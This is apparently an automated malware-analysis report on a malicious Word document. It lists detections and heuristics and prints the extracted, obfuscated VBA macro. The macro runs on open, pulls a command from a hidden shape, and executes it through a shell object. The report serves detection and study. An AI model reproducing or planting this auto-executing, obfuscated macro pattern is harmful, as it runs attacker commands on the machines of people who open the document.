Verdict: MALICIOUS
Risk score: 232
Heuristics: 9

- ClamAV: Doc.Malware.Sagent-6813871-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Sagent-6813871-0
- Suspicious cmd.exe invocation with execution flag (high, SC_STR_CMD): Suspicious cmd.exe invocation with execution flag
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
  - Matched line in script: End Select Set ndKtkQv = GetObject(aViNGFjH + "new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + jfwqG) On Error Resume Next
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro
  - Matched line in script: Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5742 bytes |

SHA-256: aedacd7e282f64b6d7178c16f25db2287c8439c417be4c9358a02ef71a877310

Detection for macros.bas:
- ClamAV: No threats found
- Obfuscation or payload: likely. 91 of 147 identifiers look randomly generated (e.g. 'jXVvYtOSvkzz'), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "jXVvYtOSvkzz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case vHbqjzq
Case 302725929
QiIZwh = 261928046
HUFwnG = CLng(166584178)
Case 280890079
wYrcCtjn = Oct(tvfoq)
UifKuV = FjzaR
Case 21230282
IACzrBS = CDate(nOoYm)
oriSdoiI = Int(179586883 * wSsSKf)
End Select
On Error Resume Next
Select Case jdBWRTp
Case 116921515
ATGcYh = 341377692
jfJdHbV = CLng(276448663)
Case 74708770
wZlhPtdp = Oct(zVqSWaP)
cravHpni = jwbBjjG
Case 204895382
raTEMzjCC = CDate(tMnDs)
twksrkww = Int(245725438 * jNdRo)
End Select
On Error Resume Next
Select Case OmfRiG
Case 97475170
haLwF = 188657891
qhBTj = CLng(297233802)
Case 271834843
dqRPLFN = Oct(MLzoj)
GGIuXZusX = qBqEvv
Case 185280007
YOCbNrD = CDate(TQwmGobAa)
KmVPdkSAZ = Int(65111219 * IORjYP)
End Select
Set ftRqbGiu = Shapes("pOlvcnLMEQjF")
On Error Resume Next
Select Case vubMiddQi
Case 230556574
stKAlaaWu = 63475444
hoCIN = CLng(120094517)
Case 190011316
YUswwOXi = Oct(NtTuvOmAJ)
vvwKF = nNmKaQLn
Case 270736379
iAvMlN = CDate(aIBqNmaPH)
LhtbJ = Int(258912727 * KBkUZ)
End Select
On Error Resume Next
Select Case MkZYZGki
Case 166386747
BOZTv = 240781802
XUpkm = CLng(113599619)
Case 170814409
SQGIFB = Oct(MdYRKEC)
bklzAdCiK = wXlSz
Case 175220290
zEGqda = CDate(IYBwvi)
zUZOzAR = Int(170097540 * PhvBJiqui)
End Select
On Error Resume Next
Select Case XwlnEvP
Case 244736724
NtTop = 846523
wirmJs = CLng(176322135)
Case 180900483
iNSDwCDRn = Oct(jdLTZBE)
NEzUFPD = wmDUiV
Case 64366555
WiwhLKqBA = CDate(QokLRl)
TNWzN = Int(49577694 * AjGQO)
End Select
ujJbDvPR = "" + TUzrFX + OvUqw + lVRQLIm + ftRqbGiu.TextFrame.TextRange.Text + athfD + hTCUQNaj + JIEsQ + AUvwCjF
On Error Resume Next
Select Case zAKUiGCo
Case 161882589
XuBRJ = 110841253
mwGbw = CLng(237881028)
Case 115353838
joJrJPfEu = Oct(djKFrkzA)
wwXsK = zHKkKwQt
Case 195538711
RswOqsqHf = CDate(kzjHVbzj)
tJvzMMI = Int(140591649 * knMmjI)
End Select
On Error Resume Next
Select Case wSjfh
Case 244841668
VKziCVkJo = 117201747
zunYS = CLng(277456066)
Case 340572131
PVFri = Oct(EdfFcn)
BBNKUdfz = rzKHzZQ
Case 168417067
tfcVW = CDate(TONzrE)
LiXvs = Int(170877653 * zMTHui)
End Select
Set ndKtkQv = GetObject(aViNGFjH + "new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + jfwqG)
On Error Resume Next
Select Case FnrDSXPb
Case 120137855
JHUoTOmL = 244161218
UzAllzb = CLng(135077707)
Case 48915476
waciK = Oct(kUYYVZL)
MtVci = IrRTR
Case 49447877
FRVwvUOr = CDate(fpiuiSmM)
umzYs = Int(183938782 * qzvFJJNCm)
End Select
On Error Resume Next
Select Case zdJfUlcXE
Case 289920356
VbdaV = 129466248
iiBmuwvw = CLng(331496348)
Case 95127897
UamuLClZ = Oct(LDNPq)
tjisiflN = CvLjM
Case 236787184
mOmjRPa = CDate(bpvOWf)
mvHDOT = Int(38142965 * GjNfsPrC)
End Select
Const NRsBilV = 0
On Error Resume Next
Select Case HHcbC
Case 341665938
jUwFStYN = 219853738
BiJNS = CLng(333961959)
Case 174234950
kOwsjKpf = Oct(atHLjsti)
MiUfisHsU = OppIBmSl
Case 283045593
kmQmMwUZq = CDate(mPjTmrU)
fElrp = Int(54604621 * rkkGZN)
End Select
ndKtkQv.Run@ ujJbDvPR, NRsBilV
On Error Resume Next
Select Case IzAPhTdJM
Case 326335513
oOkrPlK = 103001967
kdcKGC = CLng(23139221)
Case 38783127
BlwWWIIiz = Oct(miPbnY)
pFzwiZzCL = WpIiQXO
Case 70413592
YRrbik = CDate(wdbVCpmO)
zGwTLw = Int(127388358 * dmoojV)
End Select
On Error Resume Next
Select Case BFkuSDu
Case 223818561
aabRjUS = 307904585
OKVqSS = CLng(33886513)
Case 15298314
bkSRwGLwq = Oct(FtEWmM)
KNznVQiR = hzKmSp
Case 105026759
SzHJi = CDate(FjdGpXJ)
jdfHrELG = Int(130599209 * AiYMlEsQ)
End Select
On Error Resume Next
Select Case wGdiw
Case 29005930
iSSHqKmVl = 312477297
GSvPAvIVJ = CLng(28555733)
Case 235332298
zmzTUCSSw = Oct(bfGbBtjlh)
DNAwOjFhV = vtwUSUt
Case 284134565
SSdBNq = CDate(JZtOlX)
tulmAFl = Int(317965065 * wVwihlIh)
End Select
End Sub